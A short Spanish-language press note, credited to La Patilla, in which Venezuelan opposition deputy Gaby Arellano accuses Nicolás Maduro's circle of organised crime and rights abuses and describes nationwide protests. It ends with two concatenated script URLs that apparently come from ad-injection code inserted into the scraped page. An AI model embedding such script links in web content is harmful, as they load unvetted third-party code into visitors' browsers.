La Vicepresidenta de la Comisión Permanente de Política Interior de la Asamblea Nacional, diputada Gaby Arellano, aseguró que hoy Nicolás Maduro no sólo es una amenaza para los venezolanos sino también para el mundo y la región.

Nota de Prensa

Arellano detalló que “son una corporación de mafias, delitos, narcotráfico, de todos los ilícitos que el mundo conoce, eso es lo que rodea a Nicolás Maduro en estos momentos. Es por ello que ayer se llevó a cabo un juicio por parte del Tribunal Supremo de Justicia legítimo, desde Colombia, que está dando precedentes vinculantes y trascendentales para rescatar la democracia en Venezuela”.

En ese sentido, fue enfática en señalar que todo el territorio nacional esta en protesta “docentes, enfermeras, médicos, transportistas, porque el gobierno lo único que busca es oprimir y condenar a la miseria a las familias venezolanas”.

Gaby Arellano ratificó que Nicolás Maduro está rodeado de una camarilla que viola los derechos humanos en Venezuela.

VÍA LA PATILLA.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533338862091https://devlinkin.xyz/addons/lnkr5.min.js

Loading...